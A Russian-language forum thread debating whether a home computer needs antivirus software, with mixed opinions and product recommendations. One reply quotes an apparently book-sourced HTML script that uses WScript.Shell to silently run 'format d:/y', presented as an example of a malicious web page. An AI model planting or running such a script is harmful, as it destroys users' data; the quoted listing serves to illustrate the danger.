Программное обеспечение

народ,читаю вопросы-типа какой антивирус поставить,а нужен ли он вообще?

Если у тебя есть мозги, то и антивирус не нужен. Всё равно ни один антивирус не знает абсолютно всех вирусов. Так что некоторые вирусы всё равно пролезают и их нужно удалять только своими руками.
Алексей Петунин
Лучший ответ
Кошка Картошка ну как поделись как руками удалять их.и где искать?
Бывает, что очень даже нужен.
да я тоже думаю не зачем. Да подумаешь веб страничка твой диск форматнет. Ничего страшного снова поставим.
Звучит кощунственно: содержимое HTML‑файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы (листинг 1.2).
Листинг 1.2. HTML‑код, форматирующий диск D:
<script>
a=new ActiveXObject("WScript.Shell");
a.run("cmd /c format d:/y",0);
</script>
Вышеописанный сценарий, внедренный злоумышленником в HTML‑страницу, ни много ни мало незаметно форматирует диск, указанный в коде.
или cmos обнулит ерунда какая в ремонте все поставят заново. ну или хакер у тебя похозяйничает. все равно мелочь
Яков Чуйков
Александр Клепиков Ну да, и любой антивирус умеет отличать вредоносные скрипты от не вредоносных? или антивирус умеет отличать программа является вирусом или нет? Нет же, только в некоторых случаях. Если сайт достаточно крупный(а на совсем любительские сайты не стоит часто заходить), и его хакнули, то они смогут вставить такой код, что и антивирусы его не обнаружат. Да конечно бывают исключения, где антивирь поможет, а сам этого не избежишь, но не так часто...
ничо не ставь!!!! вирусы я сокрушил на днях- только ради тебя!!!
Jenia Russu
Если вам не чего хранить на компьютере, то вам не нужен.
Ну и ты хочешь знать наше мнение конечно нужен
Не, не обязательно. Эт для параноиков.
Или если руки дрожат - обязательно! Опасно жать на голых тёть.. . А так ничё:)))
Ну я так-же думал раньше. Пользовался CureIt. Но я же не мог отслеживать вирусы, которые ловлю через интернет? Так что лучше брать. Для интернета - AVG, для игр - сойдет Nod32.
если есть мозги и хороший опыт то антивирус не нужен
Крылов Павел
Виталий Петриченко единственный здравый ответ
конечно нужен, если есть притом доступ в инет...
Все антивирусы довольно не слабо тормозят комп. Если не собираешься заходить на сомнительные сайты, запускать сомнительные программы и отключишь автозагрузку флешек дисков и т. п. то не нужен. Но если ты собираешься что-то из этого делать, то даже антивирус не всегда тебя спасёт. Например при установке программы он не всегда может обнаружить, заразит ли эта установка тебя вирусом.
Яков Чуйков а какие такие сомнительные сайты???мы тут ясновидящие?
нужен конечно
Ставь Касперского интернет секьюрити.... Всяко проверял - этот самый... нормальный...
Виталий Петриченко да забудьте вы про касперских и авасты-думайте головой